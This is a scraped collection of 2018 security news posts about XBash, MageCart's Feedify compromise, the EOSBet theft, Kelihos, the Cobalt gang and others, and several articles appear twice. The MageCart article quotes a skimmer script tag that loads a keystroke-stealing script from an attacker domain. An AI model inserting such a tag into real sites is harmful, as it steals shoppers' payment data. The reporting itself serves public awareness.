
The scanner component also scans the Internet for servers that run services that have been left online exposed without a password or are using weak credentials. The scanners target web servers (HTTP), VNC, MariaDB, MySQL, PostgreSQL, Redis, MongoDB, Oracle DB, CouchDB, ElasticSearch, Memcached, FTP, Telnet, RDP, UPnP/SSDP, NTP, DNS, SNMP, LDAP, Rexec, Rlogin, Rsh, and Rsync.

Hackers attempt to monetize their efforts through coin-mining activities on Windows systems or with ransomware based attacks on Linux servers running database services.

The XBash component will scan and delete MySQL, MongoDB, and PostgreSQL databases and drops a ransom asking for the payment of 0.02 Bitcoin ($125) to recover them.

Xbash

Unfortunately, victims will never recover their data because the malware wipe data and not back it up.

“we have observed three different bitcoin wallet addresses hard-coded in the Xbash samples. Since May 2018, there are 48 incoming transactions to these wallets with total income of about 0.964 bitcoins (about US$6,000 at the time of this writing).” continues the analysis.

“the funds are being withdrawn, showing us that the attackers are actively collecting their ransom.”

Experts noticed in all versions of Xbash the presence of a Python class named “LanScan” used to target enterprise networks.  The class allows to get local intranet information, generate a list of all IP addresses within the same subnet, and to perform port scanning to all these IPs

The code is still not active in the malware, likely crooks are working on its development.

Experts believe XBash will continue to evolve, for example including the miner component for Linux servers as well.

Further info, including IoCs, are reported in the analysis published by the experts.

Pierluigi Paganini

(Security Affairs – malware, cybercrime)

The post New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms appeared first on Security Affairs.

Security Affairs: Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia

Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia, Supreme Civil and Criminal Court of Greece overruled previous ones.

The Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia, the decision has surprised the media because the man was expected to be extradited in the US or France as previously announces.

The decision of the Supreme Civil and Criminal Court of Greece has overruled previous ones that were taken by other Greek courts.

Russia, France, and the United States, where Vinnik is charged with different hacking crimes.

Greek Police have arrested the Russian national Alexander Vinnik (38) and they accuse the man of running the BTC-e Bitcoin exchange to launder more than US$4bn worth of the cryptocurrency.

The police seized two laptops, two tablets, mobile phones, a router, a camera, and four credit cards.

The authorities reported that since 2011, 7 million Bitcoin went into the BTC-e exchange and 5.5 million withdrawn.

According to the Greek media outlet the Daily Thess, the FBI tracked Alexander Vinnik for more than a year.

The man is charged by the US authorities with fraud and money laundering for more than $4 billion worth amount of Bitcoin (BTC) resulting from criminal activities, the US prosecutors requested his extradition in July 2017.

The Greek Supreme Court first opted out to extradite Vinnink to the US  to face with the charges with the operation of an unlicensed money service business, money laundering, conspiracy to commit money laundering, and engaging in unlawful monetary transactions.

Vinnik is also accused to be the responsible for the failure of the Japanese bitcoin exchange Mt. Gox.
Mt. Gox was the biggest Bitcoin exchange at the time of the shut down in 2014 that occurred after the platform was the victim of a series of cyber heists for a total of $375 million in Bitcoin.

The U.S. authorities speculate the Russian man stole funds from Mt. Gox, with the help of an insider. The stolen funds were transferred to a wallet managed by Vinnik and funds were laundered through his platform BTC-e-service during a three-year period.

In July 2018 there was a twist, a Greek lower court agreed to extradite Vinnik to France to face with charges with hacking, money laundering, extortion and involvement in organized crime.

The Russian Foreign Ministry criticized the ruling and said the country will look to a response.

“Several days after taking an unfriendly decision to expel Russian diplomats and to deny entry to several Russian citizens, they have adopted a decision to extradite Russian citizen Alexander Vinnik to France,” Russia’s Foreign Ministry wrote in a statement. “It is obvious that Russia cannot leave these actions unanswered.”

AlexanderVinnik

The Russian government officially asked the Greek government to extradite Vinnik to Russia, where he is facing around $10,000 worth of fraud charges, practically nothing compared the charges in the US and France.

Now, the decision of the Greek Supreme Court is disconcerting, Vinnik is going to be extradited to Russia.

The Supreme Court will analyze France’s request for extradition on September 19, but its decision could be overrun by the Greek Minister of Justice.

Pierluigi Paganini

(Security Affairs –  (Vinnik, BTC-e Bitcoin exchange)

The post Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia appeared first on Security Affairs.



Security Affairs

Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia

Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia, Supreme Civil and Criminal Court of Greece overruled previous ones.

The Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia, the decision has surprised the media because the man was expected to be extradited in the US or France as previously announces.

The decision of the Supreme Civil and Criminal Court of Greece has overruled previous ones that were taken by other Greek courts.

Russia, France, and the United States, where Vinnik is charged with different hacking crimes.

Greek Police have arrested the Russian national Alexander Vinnik (38) and they accuse the man of running the BTC-e Bitcoin exchange to launder more than US$4bn worth of the cryptocurrency.

The police seized two laptops, two tablets, mobile phones, a router, a camera, and four credit cards.

The authorities reported that since 2011, 7 million Bitcoin went into the BTC-e exchange and 5.5 million withdrawn.

According to the Greek media outlet the Daily Thess, the FBI tracked Alexander Vinnik for more than a year.

The man is charged by the US authorities with fraud and money laundering for more than $4 billion worth amount of Bitcoin (BTC) resulting from criminal activities, the US prosecutors requested his extradition in July 2017.

The Greek Supreme Court first opted out to extradite Vinnink to the US  to face with the charges with the operation of an unlicensed money service business, money laundering, conspiracy to commit money laundering, and engaging in unlawful monetary transactions.

Vinnik is also accused to be the responsible for the failure of the Japanese bitcoin exchange Mt. Gox.
Mt. Gox was the biggest Bitcoin exchange at the time of the shut down in 2014 that occurred after the platform was the victim of a series of cyber heists for a total of $375 million in Bitcoin.

The U.S. authorities speculate the Russian man stole funds from Mt. Gox, with the help of an insider. The stolen funds were transferred to a wallet managed by Vinnik and funds were laundered through his platform BTC-e-service during a three-year period.

In July 2018 there was a twist, a Greek lower court agreed to extradite Vinnik to France to face with charges with hacking, money laundering, extortion and involvement in organized crime.

The Russian Foreign Ministry criticized the ruling and said the country will look to a response.

“Several days after taking an unfriendly decision to expel Russian diplomats and to deny entry to several Russian citizens, they have adopted a decision to extradite Russian citizen Alexander Vinnik to France,” Russia’s Foreign Ministry wrote in a statement. “It is obvious that Russia cannot leave these actions unanswered.”

AlexanderVinnik

The Russian government officially asked the Greek government to extradite Vinnik to Russia, where he is facing around $10,000 worth of fraud charges, practically nothing compared the charges in the US and France.

Now, the decision of the Greek Supreme Court is disconcerting, Vinnik is going to be extradited to Russia.

The Supreme Court will analyze France’s request for extradition on September 19, but its decision could be overrun by the Greek Minister of Justice.

Pierluigi Paganini

(Security Affairs –  (Vinnik, BTC-e Bitcoin exchange)

The post Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia appeared first on Security Affairs.

EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS

The gambling application EOSBet was affected by a vulnerability in its smart contract system that has been exploited by attackers to steal $200,000 worth of EOS.

The security breach was first reported by the member “thbourlove” of the EOSBet Reddit community that shared the code used to exploit the flaw.

After seeing the exploit code, the EOSBet’s official Reddit account admitted the hack.

“Yep, we were hacked. But we also have this exact assertion that you do. I would be careful, it’s a bit deeper than you think.” stated the EOSBet’s official Reddit account

EOSbet app

“A million-dollar EOS gambling dApp suffered a major blow, just days after declaring itself to be the safest of its kind.” reported The Next Web website.

“Hackers have taken 40,000 EOS ($200,000) from the operating wallet of EOSBet by exploiting vulnerabilities in its smart contracts”

The gambling application is based on the EOS blockchain, it was taken offline in response to the security breach.

“[…] A few hours ago, we were attacked, and about 40,000 EOS was taken from our bankroll,” said an EOSBet spokesperson.

“This bug was not minor as was stated previously, and we are still doing forensics and piecing together what happened.”

According to the company the attackers exploited a bug in one of their games, but it seems that the same issue could affect other games of the gambling platform.

The hackers were able to forge fake hash to hijack the EOSBet’s transfer funds.

The attackers have attempted to transfer funds to a wallet under their control that looks very similar to the one used by EOSBet.

The hackers only make a limited number of transactions from a number of accounts, they used the following message or similar as a description:

“Memo: Please refund the illegal income eos, otherwise we will hire a team of lawyers in China to pursue all criminal liability and losses to you. Eosbet official eos account: eosbetdicell.”

Then crooks distributed the gains splitting them across many wallets that received small amounts of EOS tokens with the following message:

“Memo: Dear players: In order to make up for the loss of eosbet players in the hacking incident, the platform launched a recharge to send BET. 1EOS=1BET, the official eos account: eosbetdicell, the transfer will automatically give the same BET.”

It is still unclear if this incident is connected to a suspect gambler win realized the last week, the player claimed over $600,000 from EOSBet by doubling their money repeatedly in 36 hours.

Platform managers excluded any link between the hack and what is considered a legitimate win.

Pierluigi Paganini

(Security Affairs – EOSBet, security breach)

The post EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS appeared first on Security Affairs.

Security Affairs: EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS

The gambling application EOSBet was affected by a vulnerability in its smart contract system that has been exploited by attackers to steal $200,000 worth of EOS.

The security breach was first reported by the member “thbourlove” of the EOSBet Reddit community that shared the code used to exploit the flaw.

After seeing the exploit code, the EOSBet’s official Reddit account admitted the hack.

“Yep, we were hacked. But we also have this exact assertion that you do. I would be careful, it’s a bit deeper than you think.” stated the EOSBet’s official Reddit account

EOSbet app

“A million-dollar EOS gambling dApp suffered a major blow, just days after declaring itself to be the safest of its kind.” reported The Next Web website.

“Hackers have taken 40,000 EOS ($200,000) from the operating wallet of EOSBet by exploiting vulnerabilities in its smart contracts”

The gambling application is based on the EOS blockchain, it was taken offline in response to the security breach.

“[…] A few hours ago, we were attacked, and about 40,000 EOS was taken from our bankroll,” said an EOSBet spokesperson.

“This bug was not minor as was stated previously, and we are still doing forensics and piecing together what happened.”

According to the company the attackers exploited a bug in one of their games, but it seems that the same issue could affect other games of the gambling platform.

The hackers were able to forge fake hash to hijack the EOSBet’s transfer funds.

The attackers have attempted to transfer funds to a wallet under their control that looks very similar to the one used by EOSBet.

The hackers only make a limited number of transactions from a number of accounts, they used the following message or similar as a description:

“Memo: Please refund the illegal income eos, otherwise we will hire a team of lawyers in China to pursue all criminal liability and losses to you. Eosbet official eos account: eosbetdicell.”

Then crooks distributed the gains splitting them across many wallets that received small amounts of EOS tokens with the following message:

“Memo: Dear players: In order to make up for the loss of eosbet players in the hacking incident, the platform launched a recharge to send BET. 1EOS=1BET, the official eos account: eosbetdicell, the transfer will automatically give the same BET.”

It is still unclear if this incident is connected to a suspect gambler win realized the last week, the player claimed over $600,000 from EOSBet by doubling their money repeatedly in 36 hours.

Platform managers excluded any link between the hack and what is considered a legitimate win.

Pierluigi Paganini

(Security Affairs – EOSBet, security breach)

The post EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS appeared first on Security Affairs.



Security Affairs

Security Affairs: Cyber attack took offline flight display screens at the Bristol Airport

The Bristol Airport was hit by a cyber attack that caused problems with operations, flight display screens were taken offline for two days.

The Bristol Airport was hit by a ransomware-based attack that caused problems to the flight display screens for two entire days.

The news reported by the BBC and was confirmed by an airport spokesman that explained that the information screens were taken offline early on Friday in response to a “ransomware” based attack.

“Bristol Airport has blamed a cyber attack for causing flight display screens to fail for two days.” state the article published by the BBC.

“They are now working again at “key locations” including in departures and arrivals, and work is continuing to get the whole site back online.”

The personnel started incident response and contingency measures, “manual processes” manual processes have made up for the interruption of the systems, spokesman refers of usage of whiteboards and marker pens.

According to the spokesman, the airport did not pay the ransom to the attackers.

“We believe there was an online attempt to target part of our administrative systems and that required us to take a number of applications offline as a precautionary measure, including the one that provides our data for flight information screens.” said airport spokesman James Gore.

“That was done to contain the problem and avoid any further impact on more critical systems.

Bristol airpost attack

Source BBC – Image copyright JULIEANNE MCMAHON Image caption A spokesman said whiteboards and marker pens had to be used in place of display screens.

The experts don’t believe it was a targeted attack against the British critical infrastructure.

“The indications are that this was a speculative attempt rather than targeted attack on Bristol Airport.

The good news is that flights were not affected by the cyber attack

Mr Gore said flights were unaffected, but contingency measures and “manual processes”, including whiteboards and marker pens, had to be used in place of display screens.

“At no point were any safety or security systems impacted or put at risk.”

“Given the number of safety and security critical systems operating at an airport, we wanted to make sure that the issue with the flight information application that experienced the problem was absolutely resolved before it was put back online.”

Pierluigi Paganini

(Security Affairs – Bristol Airport, hacking)

The post Cyber attack took offline flight display screens at the Bristol Airport appeared first on Security Affairs.



Security Affairs

Cyber attack took offline flight display screens at the Bristol Airport

The Bristol Airport was hit by a cyber attack that caused problems with operations, flight display screens were taken offline for two days.

The Bristol Airport was hit by a ransomware-based attack that caused problems to the flight display screens for two entire days.

The news reported by the BBC and was confirmed by an airport spokesman that explained that the information screens were taken offline early on Friday in response to a “ransomware” based attack.

“Bristol Airport has blamed a cyber attack for causing flight display screens to fail for two days.” state the article published by the BBC.

“They are now working again at “key locations” including in departures and arrivals, and work is continuing to get the whole site back online.”

The personnel started incident response and contingency measures, “manual processes” manual processes have made up for the interruption of the systems, spokesman refers of usage of whiteboards and marker pens.

According to the spokesman, the airport did not pay the ransom to the attackers.

“We believe there was an online attempt to target part of our administrative systems and that required us to take a number of applications offline as a precautionary measure, including the one that provides our data for flight information screens.” said airport spokesman James Gore.

“That was done to contain the problem and avoid any further impact on more critical systems.

Bristol airpost attack

Source BBC – Image copyright JULIEANNE MCMAHON Image caption A spokesman said whiteboards and marker pens had to be used in place of display screens.

The experts don’t believe it was a targeted attack against the British critical infrastructure.

“The indications are that this was a speculative attempt rather than targeted attack on Bristol Airport.

The good news is that flights were not affected by the cyber attack

Mr Gore said flights were unaffected, but contingency measures and “manual processes”, including whiteboards and marker pens, had to be used in place of display screens.

“At no point were any safety or security systems impacted or put at risk.”

“Given the number of safety and security critical systems operating at an airport, we wanted to make sure that the issue with the flight information application that experienced the problem was absolutely resolved before it was put back online.”

Pierluigi Paganini

(Security Affairs – Bristol Airport, hacking)

The post Cyber attack took offline flight display screens at the Bristol Airport appeared first on Security Affairs.

Feedify cloud service architecture compromised by MageCart crime gang

MageCart cyber gang compromised the cloud service firm Feedify and stole payment card data from customers of hundreds of e-commerce sites.

MageCart crime gang appears very active in this period, payment card data from customers of hundreds of e-commerce websites may have been stolen due to the compromise of the cloud service firm Feedify.

Cloud service firm Feedify has over 4,000 customers, it is a cloud platform to engage customers’ clients with powerful tools that target them based on their behavior.

Feedify leverages a JavaScript script that their customers add to their websites to use the service. MageCart hackers compromised the supply chain for the Feedify service.  The script loads various resources from Feedify’s infrastructure, including a library named “feedbackembad-min-1.0.js,” which was compromised by MageCart.

Feedify

Every user a page of the e-commerce site of a Feedify customer will load the malicious script that allowed the crooks to siphon personal information and payment card data.

The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script in the target websites to siphon payment card data, once the attackers succeed in compromising a site, it will add an embedded piece of Javascript to the HTML template. Below an example script dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>

This script records keystrokes from customers and sends them to a server controlled by the attacker.

Typically hackers attempt to compromise third-party features that could allow them to access a large number of websites.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against the British Airways and used a customized version of the script to remain under the radar.

Using the same tactic, the MageCart compromised the website using the Feedify service by injecting their malicious code into a library the Feedify script served to customers’ websites.

According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.

Once notified Feedify the compromise, the company removed the malicious script:

but apparently, the hackers re-infected the library.

The events demonstrate the ability of the MageCart crime gang in compromising the infrastructure of its victims.

In August, security expert Willem de Groot discovered that the MagentoCore skimmer at the time already infected 7,339 Magento stores.

At the time, querying the PublicWWW service it was possible to verify that the MagentoCore script was deployed on 5,214 domains, actually the number of compromised website id still high (4762) despite the awareness campaign.

Pierluigi Paganini

(Security Affairs – cybercrime, MageCart)

The post Feedify cloud service architecture compromised by MageCart crime gang appeared first on Security Affairs.

Security Affairs: Feedify cloud service architecture compromised by MageCart crime gang

MageCart cyber gang compromised the cloud service firm Feedify and stole payment card data from customers of hundreds of e-commerce sites.

MageCart crime gang appears very active in this period, payment card data from customers of hundreds of e-commerce websites may have been stolen due to the compromise of the cloud service firm Feedify.

Cloud service firm Feedify has over 4,000 customers, it is a cloud platform to engage customers’ clients with powerful tools that target them based on their behavior.

Feedify leverages a JavaScript script that their customers add to their websites to use the service. MageCart hackers compromised the supply chain for the Feedify service.  The script loads various resources from Feedify’s infrastructure, including a library named “feedbackembad-min-1.0.js,” which was compromised by MageCart.

Feedify

Every user a page of the e-commerce site of a Feedify customer will load the malicious script that allowed the crooks to siphon personal information and payment card data.

The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script in the target websites to siphon payment card data, once the attackers succeed in compromising a site, it will add an embedded piece of Javascript to the HTML template. Below an example script dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>

This script records keystrokes from customers and sends them to a server controlled by the attacker.

Typically hackers attempt to compromise third-party features that could allow them to access a large number of websites.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against the British Airways and used a customized version of the script to remain under the radar.

Using the same tactic, the MageCart compromised the website using the Feedify service by injecting their malicious code into a library the Feedify script served to customers’ websites.

According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.

Once notified Feedify the compromise, the company removed the malicious script:

but apparently, the hackers re-infected the library.

The events demonstrate the ability of the MageCart crime gang in compromising the infrastructure of its victims.

In August, security expert Willem de Groot discovered that the MagentoCore skimmer at the time already infected 7,339 Magento stores.

At the time, querying the PublicWWW service it was possible to verify that the MagentoCore script was deployed on 5,214 domains, actually the number of compromised website id still high (4762) despite the awareness campaign.

Pierluigi Paganini

(Security Affairs – cybercrime, MageCart)

The post Feedify cloud service architecture compromised by MageCart crime gang appeared first on Security Affairs.



Security Affairs

Security Affairs: Security Affairs newsletter Round 180 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Domestic Kitten – An Iranian surveillance operation under the radar since 2016
·      The main source of infection on ICS systems was the internet in H1 2018
·      A growing number of iOS apps collect and sell location data
·      Chinese LuckyMouse APT has been using a digitally signed network filtering driver in recent attacks
·      Fallout exploit kit appeared in the threat landscape in malvertising campaigns
·      GAO Report shed the lights on the failures behind the Equifax hack
·      Mirai and Gafgyt target Apache Struts and SonicWall to hit enterprises
·      Adobe Patch Tuesday for September 2018 fixes 10 flaws in Flash Player and ColdFusion
·      MageCart crime gang is behind the British Airways data breach
·      Other 3,700 MikroTik Routers compromised in cryptoJacking campaigns
·      Trend Micro Apps removed from Mac App Store after being caught exfiltrating user data
·      Zerodium disclose exploit for NoScript bug in version 7 of Tor Browser
·      Cyber Defense Magazine – September 2018 has arrived. Enjoy it!
·      Microsoft Patch Tuesday updates for September 2018 also address recently disclosed Windows zero-day
·      Researchers show how to clone Tesla S Key Fobs in a few seconds
·      September 2018 Security Notes address a total of 14 flaws in SAP products
·      Cobalt crime gang is using again CobInt malware in attacks on former soviet states
·      Flaws in firmware expose almost any modern PC to Cold Boot Attacks
·      ICS CERT warns of several flaws Fuji Electric Fuji Electric V-Server
·      ICS CERT warns of several flaws in Fuji Electric V-Server
·      New PyLocky Ransomware stands out for anti-machine learning capability
·      Iran-Linked OilRig APT group targets high-ranking office in a Middle Eastern nation
·      Kelihos botmaster pleads guilty in U.S. District Court in Connecticut
·      Operator at kayo.moe found a 42M Record Credential Stuffing Data ready to use
·      China-linked APT10 group behind new attacks on the Japanese media sector
·      Dutch expelled two Russian spies over hack plan on Swiss lab working on Skripal case
·      Experts disclose a Webroot SecureAnywhere macOS Kernel Level bug found months ago

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 180 – News of the week appeared first on Security Affairs.



Security Affairs

Security Affairs newsletter Round 180 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Domestic Kitten – An Iranian surveillance operation under the radar since 2016
·      The main source of infection on ICS systems was the internet in H1 2018
·      A growing number of iOS apps collect and sell location data
·      Chinese LuckyMouse APT has been using a digitally signed network filtering driver in recent attacks
·      Fallout exploit kit appeared in the threat landscape in malvertising campaigns
·      GAO Report shed the lights on the failures behind the Equifax hack
·      Mirai and Gafgyt target Apache Struts and SonicWall to hit enterprises
·      Adobe Patch Tuesday for September 2018 fixes 10 flaws in Flash Player and ColdFusion
·      MageCart crime gang is behind the British Airways data breach
·      Other 3,700 MikroTik Routers compromised in cryptoJacking campaigns
·      Trend Micro Apps removed from Mac App Store after being caught exfiltrating user data
·      Zerodium disclose exploit for NoScript bug in version 7 of Tor Browser
·      Cyber Defense Magazine – September 2018 has arrived. Enjoy it!
·      Microsoft Patch Tuesday updates for September 2018 also address recently disclosed Windows zero-day
·      Researchers show how to clone Tesla S Key Fobs in a few seconds
·      September 2018 Security Notes address a total of 14 flaws in SAP products
·      Cobalt crime gang is using again CobInt malware in attacks on former soviet states
·      Flaws in firmware expose almost any modern PC to Cold Boot Attacks
·      ICS CERT warns of several flaws Fuji Electric Fuji Electric V-Server
·      ICS CERT warns of several flaws in Fuji Electric V-Server
·      New PyLocky Ransomware stands out for anti-machine learning capability
·      Iran-Linked OilRig APT group targets high-ranking office in a Middle Eastern nation
·      Kelihos botmaster pleads guilty in U.S. District Court in Connecticut
·      Operator at kayo.moe found a 42M Record Credential Stuffing Data ready to use
·      China-linked APT10 group behind new attacks on the Japanese media sector
·      Dutch expelled two Russian spies over hack plan on Swiss lab working on Skripal case
·      Experts disclose a Webroot SecureAnywhere macOS Kernel Level bug found months ago

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 180 – News of the week appeared first on Security Affairs.

Canadian town forced to pay Bitcoin after nasty ransomware attack

By Uzair Amir

The town of Midland, Ontario, Canada, has decided to pay cybercriminals after its servers were targeted and infected with a nasty ransomware on Saturday, September 1, at approximately 2 a.m. The total amount of ransom payment has not been disclosed but the demand from cybercriminals was that they must be paid in Bitcoin if the town wants […]

This is a post from HackRead.com Read the original post: Canadian town forced to pay Bitcoin after nasty ransomware attack

Kelihos botmaster pleads guilty in U.S. District Court in Connecticut

The creator of the infamous Kelihos Botnet, Peter Yuryevich Levashov (38) pleaded guilty this week to computer crime, fraud, conspiracy and identity theft charges.

Yuryevich Levashov (38), the botmaster of the dreaded Kelihos Botnet pleaded guilty this week to computer crime, fraud, conspiracy and identity theft charges.

In April 2017, the United States Department of Justice announced that Peter Yuryevich Levashov (36) (also known as Petr Levashov, Peter Severa, Petr Severa and Sergey Astakhov) was arrested in Barcelona for his involvement with the infamous Kelihos botnet. Levashov was extradited to the United States in February.

“Peter Yuryevich Levashov, aka “Petr Levashov,” “Peter Severa,” “Petr Severa” and “Sergey Astakhov,” 38, of St. Petersburg, Russia, pleaded guilty today in U.S. District Court in Hartford, Connecticut, to offenses stemming from his operation of the Kelihos botnet, which he used to facilitate malicious activities including harvesting login credentials, distributing bulk spam e-mails, and installing ransomware and other malicious software.” states the press release published by the DoJ.

Levashov on Wednesday pleaded guilty in U.S. District Court in Hartford, Connecticut, to one count of causing intentional damage to a protected computer, one count of conspiracy, one count of aggravated identity theft, and one count of wire fraud.

kelihos botnet

According to a study conducted by CheckPoint Security, a malware landscape was characterized by some interesting changed in this first part of 2017.

The Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.

Levashov has operated several botnets between since the late 1990s, for example, two other botnets tracked as Storm and Waledac borrow the code with Kelihos, both have been attributed to Levashov.

“For over two decades, Peter Levashov operated botnets which enabled him to harvest personal information from infected computers, disseminate spam, and distribute malware used to facilitate multiple scams,” said Assistant Attorney General Benczkowski.

“Mr. Levashov used the Kelihos botnet to distribute thousands of spam e-mails, harvest login credentials, and install malicious software on computers around the world,” said U.S. Attorney Durham.  “He also participated in online forums on which stolen identities, credit card information and cybercrime tools were traded and sold.  For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users. “

The DoJ speculated Levashov sent spam urging recipients to buy shares as part of a “pump and dump” scam, among other naughtiness.

The Russian hacker was accused to have used the Kelihos botnet for spam campaign that advertised various criminal schemes, including pump-and-dump stock fraud.

The activity conducted by the Kelihos, Storm and Waledac botnets was very profitable, prosecutors believe they allowed crooks to earn hundreds of millions of dollars

“For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users,” said U.S. Attorney John H. Durham of the District of Connecticut. “Thanks to the collaborative work of the FBI and our partners in law enforcement, private industry and academia, a prolific cybercriminal has been neutralized, and has now admitted his guilt in a U.S. courtroom.”

The sentence has been scheduled for September 6, 2019, likely because the man is now helping law enforcement agencies on investigations on other cybercrime operations.

Pierluigi Paganini

(Security Affairs – Kelihos, malware)

The post Kelihos botmaster pleads guilty in U.S. District Court in Connecticut appeared first on Security Affairs.

Russian Cybercriminal Pleads Guilty to Operating Kelihos Botnet

By Uzair Amir

A Russian national namely Peter Yuryeich Levashov has pleaded guilty to operating the Kelihos botnet, which was used to launch a huge spamming and credential stealing campaign across the globe. Levashov, a 38-year old resident of St. Petersburg, Russia, was presented before a Connecticut US District Court and admitted to being involved in a large […]

This is a post from HackRead.com Read the original post: Russian Cybercriminal Pleads Guilty to Operating Kelihos Botnet

Phished credentials caused twice as many breaches than malware in the past year

Personal device use for remote work poses the biggest security risk to organisations safeguarding their increasingly mobile and cloud-based IT environment, according to a new survey of 100 UK-based senior

The post Phished credentials caused twice as many breaches than malware in the past year appeared first on The Cyber Security Place.

Cobalt crime gang is using again CobInt malware in attacks on former soviet states

The Russian Cobalt crime gang was particularly active in the last month, a new report confirms a massive use of the CobInt malware in recent attacks.

Security researchers from Proofpoint reported the massive use of the CobInt malware by the Cobalt group in recent attacks. The Cobalt name is based on the association of the malware with the “Cobalt Group” and an internal DLL name of “int.dll” used in some of the samples detected by the experts.

On August 13, 2018, security experts from Netscout’s ASERT, uncovered a new campaign carried out by the Cobalt crime gang. The hackers targeted also the NS Bank in Russia and Carpatica/Patria in Romania.

Cobalt crime gang has been active since at least 2016, it targeted banks worldwide, the group leveraged spear-phishing emails to compromise target systems, spoofed emails from financial institutions or a financial supplier/partner.

The attackers exploited several vulnerabilities in Microsoft Office, including CVE-2017-8570CVE-2017-11882, and CVE-2018-0802.

The group also targeted entities in other sectors, including Government agencies, Telco, Internet service providers, manufacturing, entertainment, and companies in the healthcare industry.

Early this year the hacker group used the malware as a first-stage downloader, but in later attacks, the crew did not use it anymore. CobInt is a multi-stage CobInt malware dropped by the group via malicious Office documents that were created using the ThreadKit builder kit.

The Cobalt crime gang used again the CobInt backdoor in many attacks since July, including the attacks aimed at the Russian and Romanian banks.

In August, Proofpoint experts observed at least four campaigns of the group leveraging the CobInt malware.

“We have also observed an actor commonly known as Cobalt Gang (or Group) using another new downloader that shares many of these characteristics since early 2018. Group-IB named this malware “CobInt” and released a report on its use by Cobalt Gang in May [3]. While we noticed that Cobalt Gang appeared to stop using CobInt as a first-stage downloader around the time researchers at Group-IB published their findings, they have since returned to using the downloader as of July.” reads the analysis published by Proofpoint.

Below the list of the attacks carried out by the Cobalt crime gang in the last weeks:

Date Description CVV
August 2, 2018 Attacker used messages with the subject “Подозрение на мошенничество” (Translated from Russian: “Suspicion of fraud”) purporting to be from “Interkassa” using a sender email address with a lookalike domain “denis[@]inter-kassa[.]com”.
August 14, 2018, Attackers used messages spoofing the Single Euro Payments Area (SEPA) with lookalike sender domains sepa-europa[.]com or sepa-europa[.]info and subjects such as “notification”, “letter”, “message”, and “notice”. The messages (Figure 1) contained: CVE-2017-8570, CVE-2017-11882, or CVE-2018-0802
August 16, 2018, Attackers used messages purporting to be from Alfa Bank using a lookalike domain aifabank[.]com and subjects such as “Fraud Control”, “Фрауд” (Translates to “Fraud”), “Предотвращение хищения” (Translates to “Prevention of theft“), and “Блокирование транзакций” (Translates to “Transaction Blocking”). CVE-2017-8570, CVE-2017-11882, or CVE-2018-0802
September 4, 2018 Attackers used messages purporting to be from Raiffeisen Bank using lookalike sender domains ralffeisen[.]com and subjects such as “Fraudulent transaction”, “Wire Transfer Fraud”, and “Request for data”. CVE-2018-8174

 

Cobalt crime Gang.png

Malware analysis reveals that the CobInt is a downloader written in C that can be broken up into three stages: an initial downloader for the core component, the core component, and several additional modules.

The first stage downloader disguises its activity by the use of Windows API function hashing and downloads the second stage via HTTPS.

The main component downloads and executes various modules from its C&C. C&C hosts are stored in a 64-byte chunk of encrypted data that can be decrypted by XORing with a 64-byte XOR key.

The malware supports the following commands:

  • load/execute module;
  • stop polling C&C;
  • execute function set by module;
  • update C&C polling wait time.

These, Proofpoint notes, are reconnaissance steps that the attackers are likely to follow with the deployment of additional modules to the compromised systems of interest.

“CobInt provides additional evidence that threat actors — from newer players we featured in our AdvisorsBot blog to established actors like TA505 and Cobalt Group– are increasingly looking to stealthy downloaders to initially infect systems and then only install additional malware on systems of interest.” Proofpoint concludes.

“As defenses improve across the board, threat actors must innovate to improve the returns on their investments in malware and infection vectors, making this approach consistent with the “follow the money” theme we have associated with a range of financially motivated campaigns over the years. This appears to be the latest trend as threat actors look to increase their effectiveness and differentiate final payloads based on user profiles” 

Further details, including IoCs are reported in the analysis published by Proofpoint.

Pierluigi Paganini

(Security Affairs – Cobalt crime gang, hacking)

The post Cobalt crime gang is using again CobInt malware in attacks on former soviet states appeared first on Security Affairs.

Air-conditioned apocalypse: A blackout scenario involving smart climate control devices

By David Balaban

Science fiction movies often depict various situations related to cybercriminals’ activity. These can include predicaments where threat actors disrupt the transportation system of a large city or cause power outages in entire regions. In fact, this is beyond science fiction these days – impacting the power grid isn’t that difficult. The only viable way to […]

This is a post from HackRead.com Read the original post: Air-conditioned apocalypse: A blackout scenario involving smart climate control devices

Teen arrested for DDoS attack on ProtonMail & making fake bomb threats

By Waqas

ProtonMail, a Swiss-based end-to-end email encryption service, has announced the name of one of the attackers involved in the DDoS attack against the company earlier this year. Due to the attack, the email service of ProtonMail stopped responding for a minute several times despite having adequate mitigation measures in place. The identified hacker, a teenager […]

